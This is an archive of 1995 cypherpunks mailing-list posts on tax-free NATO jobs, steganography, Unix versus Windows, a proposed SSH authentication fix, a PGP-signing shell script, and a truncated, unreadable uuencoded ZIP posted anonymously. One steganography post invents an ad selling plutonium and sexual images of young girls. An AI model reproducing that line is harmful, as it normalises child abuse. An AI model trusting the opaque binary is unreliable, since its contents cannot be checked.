OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:18:41 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <v01510100ac2d7f54957c@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>Looking for a place that:
>
>(1.) is reasonably free
>
>(2.) permits Americans to work
>
>(3.) a person trained as an engineer can earn enough to feed and shelter
>     self and 4 dependents.
>

Tattoo this on your arm: N.A.T.O.  If you work overseas, you deduct 70
kilobucks  from your gross income on your 1040.  And NATO civilian
employees pay NO INCOME TAX TO ANY OTHER NATO COUNTRY.
Good bennies package, too.

Downside? A Glacial Slug-like Beauracracy which doesn't seem to get alot done.
3-Year contracts only.  Major competition from Euro's who seem to know about the
perks.

Organization Motto:  "It's a cushy job, but somebody's got to do it."

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfXPo4k1+54BopBAQGxYwP/TkePpofICj/w554DfO2ugqKXo/Jzrz+0
YebTxGHi4cgjDSwnOco4a8GYjDtInbWdyCF9qwt1QzQli7hw4o5fjKKb6as8JOMX
WGcotpJwmsiNgBcUC/aUshmAdHjpK/tkZrwumeV8hx5acxmgqvE8pGNT3Fc0QYhn
QwtB/SWjS9k=
=ejaZ
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <v01510102ac2d82ae5f36@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>Is there any precedence or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?
>

It's extremely difficult to do that and not get laughed out of court.
Think about it.  If the president or congress could be sued for their official
actions, every unemployed auto worker would be suing them for not restricting
Japanese imports.  That's what sovereign immunity is for; to keep the
government from being nibbled to death by millions of little nuisance suits
from soreheads all over the country.

>Alternatively, could a civil suit be filed for invasion of privacy or
>somesuch? Or perhaps the previously mentioned violation of civil rights (a
>la Rodney King)?
>

Well actually, Congress is probably not subject to it's own laws on privacy.
I remember during the Clarence Thomas confirmation hearings there was a bit of
a to-do about exactly who it was that leaked Anita Hill's allegations to the
press; and Joe Biden was going around saying "No crimes were committed, no
crimes were committed."  This was explained as Congress-speak for "The leak of
Hill's allegations were done by a Congressman, not a staffer" (It's illegal
for staff member to disclose confidential material, but it's OK for his boss
to do it).

>How many laws, etc, can we invoke? I mean, most congresscritters don't craft
>laws on their own, so the involvement of their staff would constitute
>conspiracy, as well, wouldn't it?
>

First rule of computer self preservation: never try to hack a hacker.  Any
legal harrassment you can do to them, they can do to you.  They're better at
it, and they've got a lot more money than you do.


-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfWao4k1+54BopBAQGjXgP/e6I7dvnOb45EGD4M06KIuKvZu1FqAQFV
Ljt5YFwPrIJuvoiVCZ+u/5d4EGsmCjh3kAUmFY/mJG/9dUj4nFMJFZjssjtuVi3X
hY4I/XFzx6tyTEE0RYOjgZPYx/ruZxegNSBnwMypDAGoYnw2SlExV22hLqVBT3A2
mZLKkHYpm0Q=
=ARI+
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 15 Jul 95 16:17:51 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <Pine.3.89.9507152344.A1196-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



So, anyone want to volunteer to port Privtool to Windows ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 17:29:04 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: def'n of "computer network"
Message-ID: <199507160028.RAA08597@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
>> Perry, I don't understand.  If the least significant bits in my gif file
>> follow all the "known statistical distributions", how can anyone know 
>> whether they are "just noise" or are an encrypted message,

Perry E. Metzger wrote:
> Indeed -- how could the recipient even know to look,

Assume we have good public key steganography tools (I am not
aware of such tools.)

The recipient would have to scan a large pile of random 
pictures in the hope that some of the messages, when 
decoded using his private key, decoded into a correctly
formatted message.

Although prearrangement is needed, otherwise he would not 
be scanning this pile of random graphics for secret messages, 
he does not know whether he will receive a message or not, 
and no one else can know if he has received a message or not.

For example:

  "I have plutonium and bondage pictures of nine year old girls
   for sale"   My public key is 7uL623uvGjg8N-u7hO789HcysFhGyvcAgyh
   Interested parties should post replies stegoed into images
   posted on 
   alt.binaries.pictures.erotica.blondes.dinosaurs.oral.fetish.waifs

   Please use only new dirty pictures to hide your message in --
   not images I have already seen.
  "

Then people can post replies without anyone knowing they are
posting encrypted messages.
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 17:29:11 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <199507160028.RAA08617@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:25 PM 7/15/95 +0100, Andrew Spring wrote:
> If your attacker has a more sophisticated statistical model of noise
> distributions than you do, then he can deduce the existence of message.

Since each hardware scanning device, and each image source, has 
idiosyncratic forms of noise, it is much harder to detect 
unusual forms of noise, than it is to emulate a usual form
of noise.

The attacker will get a huge number of false positives.  He
will not know if there is a whole lot of stego going on, or
he needs to adjust his noise models for a whole lot of
cranky and/or funky scanners.


--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sat, 15 Jul 95 08:02:37 PDT
To: rsalz@osf.org
Subject: Ssh "security hole": proposed fix
In-Reply-To: <9507151255.AA12685@sulphur.osf.org>
Message-ID: <199507151502.SAA01269@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


I am thinking about the following solution to the issues pointed out
by David Mazieres.

These changes propose solutions to the following problems:
  - replay of password-authenticated sessions
  - corrupt server can use RSA authentication to log into another server

When the client receives SSH_SMSG_PUBLIC_KEY, it computes a 128 bit
(16 byte) value by converting the modulus of the public key into a
stream of bytes, msb first.  The cookie sent by the server is appended
to this stream.  Both sides compute the MD5 of the resulting stream.
This value will be called the "session id".

In the SSH_CMSG_SESSION_KEY message, the first 16 bytes of the session
key (before encryption) are xored with the 16 bytes of the session id.
This does not reveal plain text from the RSA-encrypted part, but binds
the encrypted session key to a specific cookie and server.  This
should eliminate the possibility of replay, because the cookie is
unique for each connection.

In all SSH_CMSG_AUTH_RSA_RESPONSE messages (used both in user and
client host authentication), append the session id to the decrypted
challenge before computing MD5.  The MD5 is computed from the
resulting 48 bytes.  This makes the response bound to the server
cookie and the server key, and should elinate using the same response
for another server.  (Faking the server key is hard, because the
client verifies that it matches the one stored in its database.)

If a server supports this revision of the protocol, it reports its
protocol version as 1.1.  If the server protocol version is 1.0, the
client displays a warning (recommending to update server software) and
uses the old protocol for compatibility.  The client reports the
protocol version that it will use.  The compatibility code will be
removed in a later release.  (The changes are easy to implement
compatibly.)

I would like to receive comments on this.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 18:19:26 PDT
To: "Rev. Mark Grant" <cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <199507160119.SAA10662@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 PM 7/15/95 +0100, Rev. Mark Grant wrote:
>
>So, anyone want to volunteer to port Privtool to Windows ?

Uh, pardon my ignorance, but what is privtool, and why is it
a good thing to port it to windows?

(As compared to the task of integrating PGP into microsofts
mail tool.)
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 16:25:04 PDT
To: tcmay@sensemedia.net
Subject: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <ac2d93b913021004f19f@[205.199.118.202]>
Message-ID: <199507152320.AA05094@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
   the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
   recollect who was who in this battle). Maybe it was the News vs. X vs.
   OpenLook vs. NeXTStep vs. etc. user interface battles.

Well, it looks like there will be a major Unix mainstream again
with two branches capable of more-or-less running each other's
binaries without too much pain: FreeBSD and Linux.

   In any case, I expect Windows (and Windows NT) will take an ever-increasing
   share of the market for at least the next several years. I'm hardly alone
   in this expectation.

BTW, I hear Linux can now run Windows 3.1 in its DOS box.

Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 15 Jul 95 18:36:09 PDT
To: alex <cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
Message-ID: <ac2db8a0140210049d2e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 AM 7/16/95, alex wrote:
>MS-Windows boxes and Macs still don't do multitasking well;  that's going

Agreed, certainly.

>The preeminence of unix in a lot of the work that's being done isn't the
>result of snobbishness or even personal taste.  It's just a nice,
>convenient platform to do the work on.

I certainly would never say the success of Unix is due to snobbishness,
though personal taste does play a role. And, historically, the
academic/pedantic aspects of Unix played a role in its adoption.

(Most important, I think, was that the proliferation of minicomputer and
mainframe operating systems was controlled by Unix killing off all the
proprietary, vendor-specific OSs.)

>People pick the tools they feel comfortable using, and they match them to
>the job at hand.  I can't run Pagemaker on my linux box so if I need to do
>some layout work I use a mac or ms-windows.  But if I want to set up a web
>server I use linux because it's quick and cheap.  If you want to edit a
>feature film, use an SGI workstation.  If you want to set up a word
>processing system that someone from the temp service will be able to run,
>use ms-windows and word.

Sure. Same here. All I was addressing was the claim that no vanguard apps
ever appear on PCs, that Unix is where it all happens.

>I'm sure that when windows-95 comes out officially, good tools will appear
>for that platform.  But the lack of solid multitasking and freely
>available development tools in ms-windows 3.11 is the reason that more
>robust crypto tools for that platform don't exist, not an ivory tower
>mentality on the part of the people doing the work.

I certainly have not claimed that. In fact, I'll be the first to concede
that Mac users are more ivory tower types, in the sense of being fanatics
and advocates for their platform. (Though there are some Unix bigots out
there, notably now on Linux....I don't see Linux making any strides in the
workstation (SGI, Sun) market, just on the cheap Intel-based boxes
people--mostly non-corporate, it seems to me--are buying.)

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 17:00:22 PDT
To: cypherpunks@toad.com
Subject: Finally got pgp... here's my key.
Message-ID: <199507152356.AA07171@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I know, it's not really signed/verified, but it'll
have to do for now.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAIbBcAAAEEANGhGNu6EcmxoqUC/1dHz+ZJinZIXJ1tyrsGdw2vR76uymqn
hYGIzxFTAvB2WMZMko/6VEYOLXF8i6CUrZOg/ojzbExcaS9wYeBsNzY3FsjvEbfI
v0kSIn8bN8YTdUO/OQ1HBgMUvUAGkTaac+hbM9Nxsj1mL8yCM+DFwYBSGL/hAAUR
tCdQaGlsaXAgR2VyYXJkIEZyYWVyaW5nIDxwZ2ZAdHlyZWxsLm5ldD4=
=T1NA
-----END PGP PUBLIC KEY BLOCK-----

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Sat, 15 Jul 95 17:19:37 PDT
To: cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <199507152320.AA05094@tyrell.net>
Message-ID: <199507160024.TAA05082@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


MS-Windows boxes and Macs still don't do multitasking well;  that's going
to change soon, and when it does, I'm sure that a lot of nifty new tools
well appear.  But multitasking is important if you want to run servers
(like remailers), and it's very helpful if you want to tie different
programs together (ie., elm talks to premail which starts pgp 5 times and
hands the result to sendmail, all without my noticing). 

The preeminence of unix in a lot of the work that's being done isn't the
result of snobbishness or even personal taste.  It's just a nice,
convenient platform to do the work on.  

People pick the tools they feel comfortable using, and they match them to
the job at hand.  I can't run Pagemaker on my linux box so if I need to do
some layout work I use a mac or ms-windows.  But if I want to set up a web
server I use linux because it's quick and cheap.  If you want to edit a
feature film, use an SGI workstation.  If you want to set up a word
processing system that someone from the temp service will be able to run,
use ms-windows and word.

I'm sure that when windows-95 comes out officially, good tools will appear
for that platform.  But the lack of solid multitasking and freely
available development tools in ms-windows 3.11 is the reason that more
robust crypto tools for that platform don't exist, not an ivory tower
mentality on the part of the people doing the work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 15 Jul 95 21:04:29 PDT
To: cypherpunks@toad.com
Subject: re: unix, vanguard
Message-ID: <199507160403.VAA04878@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>The preeminence of unix in a lot of the work that's being done isn't the
>result of snobbishness or even personal taste.  It's just a nice,
>convenient platform to do the work on.  

There is a well written essay on the "preeminence of unix" at
http://gnn.com/gnn/bus/ora/features/history/index.html.  It
essentially says Unix has survived for so long because universities use
it, and you could license it fairly cheap.  Most people (I'm talking
about 90% of computer users, even more in the future) couldn't care
less about features such as tying apps together with shell scripts, 
pipes, and some bubble gum.

>But the lack of solid multitasking and freely available development 
>tools in ms-windows 3.11 is the reason that more robust crypto tools 
>for that platform don't exist.

What are some "robust crypto tools" that are available for unix, and also
aren't available for DOS/Windows?

I kinda think the reason more tools aren't available for PCs (Windows/Mac)
is because there is no appreciable MARKET for such tools yet.  If there
were, since PCs have a market share an order of magnitude or two larger
than unix, such tools would have a greater influence anyway.  
--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex McLean <alex@forestbk.demon.co.uk>
Date: Sat, 15 Jul 95 14:16:10 PDT
To: cypherpunks@toad.com
Subject: Uk hackers
Message-ID: <88422937wnr@forestbk.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

We're preparing to send a press release to all the UK newspapers and 
magazine that we can afford, on the subject of hackers.  So far there 
haven't been many attacks by the media on this often misrepresented 
group, and we hope to start building a good relationship between 
hackers and the media while it is still possible.

We plan to send them a comprehensive letter offering an alternative to 
the hacker stereotype, and maybe a floppy disk containing a few usenet 
faq files on the subject.

If you have any ideas, suggestions or contributions to this effort, I'd 
very much like to hear from you.

I'd also like to hear from you if you are a journalist yourself, and 
would like a copy of our release once it is done, or further 
information about our cause.

Or if you'd just like a chat about this subject (wherever you are), 
feel free to mail me.

Thanks,


Alex

-- 
All generalisations are false.  That last sentence isn't a paradox of 
self-reference, and neither is this one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <mazieres@pa.dec.com>
Date: Sat, 15 Jul 95 23:20:57 PDT
To: ylo@cs.hut.fi
Subject: Re: Ssh "security hole": proposed fix
In-Reply-To: <199507151502.SAA01269@shadows.cs.hut.fi>
Message-ID: <9507160615.AA06186@venus.pa.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, here is the proposed new ssh protocol as I understand it.

  A -> B: A
  
  B -> A: PKb, PKsb, Cb

    session_id := {PKb, PKsb, Cb}_MD5
  
  A -> B: Cb, {{session_id XOR Kab}_PKsb}_PKb        (*)
  A -> B: {A}_Kab
  A -> B: {PKa}_Kab
  
  B -> A: {{Nb}_PKa}_Kab
  
  A -> B: {{Nb, session_id}_MD5}_Kab

It does seem to solve the two problems I pointed out.  However, I am
troubled by how complicated the protocol is, and how much encryption
is going on.  One of the principles I have heard stated says that more
encryption does not mean more security.  A good example of that seems
be the session key PKsb above.

In line (*) of the protocol, you say the session key (or now I guess
really session_id XOR Kab) is encrypted first with whichever of Kb,
Ksb has the larger modulus.  Under normal circumstances (the ones
depicted above), the first encryption will be with PKsb.  However, if
ever PKb were to come first, then PKsb would be completely vulnerable
to a "man in the middle" attack, and thus would be completely useless.

Wouldn't it make sense to simplify the protocol significantly, so as
to make it easier to understand and easier for us to convince
ourselves of its robustness?  What about something like what follows
this message?

To come up with the protocol I appended, I took your protocol and
stuck the the full context of each message into the message itself, so
that none of the previous problems could occur.  Then I eliminated all
complications like double encryption and challenges that did not add
to the security of the protocol.  Now granted I'm no authentication
expert and could easily have made a mistake here, but at least it will
be easier to catch because the protocol is simpler.  Who know what the
implications of that XOR really are?

David


PREAMBLE:

(1)  A -> B: A

(2)  B -> A: Cb, PKsb, PKb

(3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab

(4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab


SSH_AUTH_RHOSTS:

(5)  A -> B:  0

SSH_AUTH_RHOSTS_RSA:
SSH_AUTH_RSA:

(5)  A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab

SSH_AUTH_PASSWORD:

(5)  A -> B: {Ka}_Kab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sat, 15 Jul 95 21:46:30 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN:  Simple Script for Signing Pine Email
Message-ID: <Pine.ULT.3.91.950715233427.26104A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I liked using the mkpgp program for signing email, but found that, quite 
frankly, it had too many features for me to use, when really all I wanted 
was a program that would sign my messages easily.  This accomplishes just 
that.  If you want to encrypt messages, either use mkpgp or encrypt your 
messages outside of pine.

Instructions are provided as comments within the script.

Let me know if you have any problem.

============ ** CUT HERE **

#!/bin/sh

# PINESIGN v1.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to sign the message.  If you respond with y, Y or just 
# press return, you will be prompted for your PGP passphrase and then 
# dumped back to the address/subject section of Pine.  If you type 
# anything else, your message will not be signed.  Your .signature file 
# will be appended AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that your define your alternate
# editor to run implicitly. 

###  DO NOT EDIT ANYTHING BELOW THIS LINE  ###

$PINEEDITOR $1
clear
echo -n "Would you like to sign this message with your PGP signature? [y] "
read ANS

if [ "$ANS" = "y" ]
	then pgp -sat +comment="PGP Signed with PineSign 1.0" $1
	mv $1.asc $1
fi

if [ "$ANS" = "Y" ]
	then pgp -sat +comment="PGP Signed with PineSign 1.0" $1
	mv $1.asc $1
fi

if [ "$ANS" = "" ]
	then pgp -sat +comment="PGP Signed with PineSign 1.0" $1
	mv $1.asc $1
fi

echo " " >> $1
cat $SIGPATH >> $1

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAiZnTokqlyVGmCFAQGEdwP/bEpO7xcABhc5RTmWg0zfB+42r7GJyURJ
b4x36dudJfHV5BWnwS3hK3OyunalPkTjIjoztG5pANL1FU9OWqP3fNqedYzXTzy5
uhmWqVQ40znnDc4iipTRenUZgjI4x7BuXIh+CRoYJ3rvPuvc73ZARRaYzlpgxDBT
M1m8RSeMrhE=
=kA0H
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 18:02:04 PDT
To: cypherpunks@toad.com
Subject: Front-End for OS/2
Message-ID: <9507160037.AA12722@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Here is a front end for integrating PGP management into the Enhanced
Editor that comes with OS/2 WARP at no extra charge.  The integration
is via a new PGP menu bar item that manages PGP commands with mouse
clicks and hides most of the offputting command-line difficulties.

This file does not contain PGP itself.  The package is a macro only.

Enjoy and imitate!

table
 !"#$%&'()*+,-./0123456789:;<=>?
@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
begin 666 GCPPGP10.ZIP
M4$L#! H      %&I?!VG[NLN<D\  ')/   ,    1T-04$=01D4N6DE04$L#M
M!!0  @ ( %NZ>AUD7-6!!BP  "Y3   +    1T-04$=01D4N97BM? E<E->UM
M^/<-,,  @C (B.@%-"BR*VI,-&&9&:D(%! UM;$C##!_86:<&<!#4YJ7F*UYM
MM35Y-$VS-$V;9FW3M'EMTC1-TR9-DS9)H^S!)0IA,RZX(*#P/^?>;Q843=[[M
M_Q/FFWO//=L]]YQSS[W?_)2D<XN?."#]/_]W9^35L$5SO7N)&GKF!M_J%QH@M
M2?O]!#3!GYZ/1WGP+@1ZVK_C6.LZ*TH72Z/8^I,T)(TH8_.DC 9)DF5I2I*EM
M^8:\S<6;BE-R"W5;"LI2MA7?=ELQ,SK9MN+2C>7%6XJ8O&2)+$U/+UFRA&C#M
M)%]IB6 #H=/J8 GF3*N#) B95H=($#RMGB-!T+0Z5(+)J3 Y1E)'2G!6M'#\M
MS)1ZGM2,H%-3'ZG@BZDD_589N_A7!"-33WZH(O3WI]11$KP]I8Z6X*TI=8 $M
M;TZI R5X8TJMX<2_GM*JPWCK9]B:RUO_A:UPWKH76Q$2W#.EUDK-_A+</07_M
M,07?G7K7EWK?GH+&*:B>@JHIV#GU5P+=/@6W34'!%&1-0?H4I$[]C:#+IF#)M
M%&BGX-1E^.(RC%SFT('+</PRM%^&WUV&5R[#RP+ZXF5X]C+LOPP[+\.W+L/MM
M GK;9:BX#&LOP]@E.',)3EWBT)%+,' )_GD)?G()'KD$K0*Z_Q)\_Q(T7(+5M
MER#[$JP0T/1+L/P2A%R"#R?AO4EX=Y)#WYZ$-R?AC4GXXR2\-@F_%]#?3L*OM
M)^&)27!,PNY)L KHKDFHF82*2<B8A+1)2!'0I9.P>!(2)B%^$A9-0IR QDQ"M
MY"3X3D+/!'1-0,<$AQZ8@(\FX,\3\*,)^*\)>$A ]TW ]R8 )B!O FZ=@/4"M
MNG8"5DW #1,P/@YCXW!^G$//C,,7XW!H''XS#B^,PW,"^HMQ>&H<GAR')\;AM
ML7%X5$!;QV'_.-P]#CO&8?LXW":@%>-0.@[KQR%H' +'P5] ?<9A^B(,781?M
M7807+\+S%SGTF8OPLXMPST7(O0BW7H3U KKV(JRZ" LNPN=CT#<&Q\8X]/ 8M
M](S!W\?@X3'8/P8_$- 'Q^"^,=@]!MECL&(,,@4T=0R6C4'H&'1?@(,7X),+M
M'/KA!7C_ KQ^ 9Z\ (]=@$<%M/4"[+\ < %678"5%R!+0-,N0/(%"$?:\_#QM
M>?CP/(>^?Q[>/0]/GX?-YZ'L/'Q=0#>=AX+SD'P>CIV#H^?@\#D.[3D''>?@M
M+^?@SG/0<@[N$- ]Y\!Y#LK/0<@Y"#H'@0+J=P[D<]!_%IXX"X^=A4?/"LW.M
MPOZSL.<LK#L+-YV%&P4T^RQDGH6(L_#/47AW%/XVRJ%OC<(;H_#Z*+PV"K\?M
MA5<%]#>C\-(H_'(4]H_"OE'X3P&]?Q3VCD+S*&P=A8I1*!?0DE$H'(7<45@XM
M"M&C,&_T;V'2?,F&0^_(F$2FSNC], MA3HF5X(LS2?IM?C ^W0(?G]EW)[QUM
M)DQ>(*D#67,@@]=QL%$,_OK,PTB1(4E^\!)"?^@'+YQIA8?.[$.&#YQYQ$^%M
M#.$;9Z#A-%A/A_G$$0L2H-8PQ#"??MW/GS!J3OO*8#K=AJ-026TCMC4,;C_=M
MK&%:=1"G@>VGD_0GN5R$PFW8D]6P[;0ZF!ERU;#\-"2?AJ6G8<EIB#\=YK=0M
MPH'F8 8,$9>H.1GV%I[^4 4+3AOU2#+_-$*T$'U:BZ@P<FK?G32]H5-)^KO4M
M<.R4.H0U!S$X>DK+T0[C]UQ)RPTQAS7/8="%F-_EG V_4<,G+H*/%8(/\3M\M
M!L%[2/ ;M6L&[V#O;VIXXY0ZE!E.J0GT&H(ZU/"B%^AY! VIH54!P?>IT1S*M
MX,%36K@3/RTH)@3%W8%MQRFM>T%V(V&\/UA/M<*64[0@Q:>6^ON1N=\\289^M
M[F03/I\^R9<%!3UU$@W_Y,DD_3?]<9YH='CD)-G6[(^SH.X/J0L/G.23N^^DM
M%AKQ8S[9A$/5)V'G26YS-$$( ^-)HWY. %^U'<CQ%_[<6[Y)$KZ!_=?]$0GWM
M"L-;O!$NG&X;C@SYPQ;"VHSM(_YH3<+JYXUPB3,IH^&OX_"$?YBT2&JE1;T5M
M%<G 3]I);@J:[ TG(P."7>Z\&-&7!G#RE"]H[E%?T-SG?N&:>^@7_C3#$/Q"M
MIPG@TPCDJZ:1R-PA3%\? .=/J,.8P1$ O=3 !=7?&] <QN#O)[0T\$/>>9EWM
M<('T/^?]A\3@KWC'R3NPZ403/M><@%4G8.4)R#H!Z2=PBOC'/<?U ?\3VK  M
M)MTD9\]EJMU^)\*9K7DN Y\36I!.Y*HC6',$@ZF1"KUOH.&!P.9P!I=&VO +M
M_PZV:=5:UJQE<&XD29\<"*,C."G#O8$$&D+0ND 8\ (=15!)(!P>P4DKH X$M
M509"FQ?H7PAJ#(0/1L@9!>AM!-T;"&]QT.T!I-&;"#H?2"L;(*&5L%Q <U"YM
MH)'TKP;"ZR-83!C^& BO4 .MK?\HL!G+BY='M/#2B)9@@1(QP)$!/O("AQK.M
M\\YSB/8,!^ R/SYR*9 GF<=&J/#YR0@5-LX16N,=([3&VT:4-:8 &%FF"7+YM
MQ"94\F8-]XF-(^A2&T;N(:K5(V%R/'H55DZK$.-V@1$X@DE0/1*;*6L8Z> [M
MHL54H045?L^1<#5&/+F!KR-,#"?I?ZJ!B\.QQ"!3#F84E&AON#!,$3(VO78.M
M^Z-F?E Z6BC+)Y2AW\D2G!NNT'^J@5$D^]?POD0N_(-A-)]=!?\87J/7!I$IM
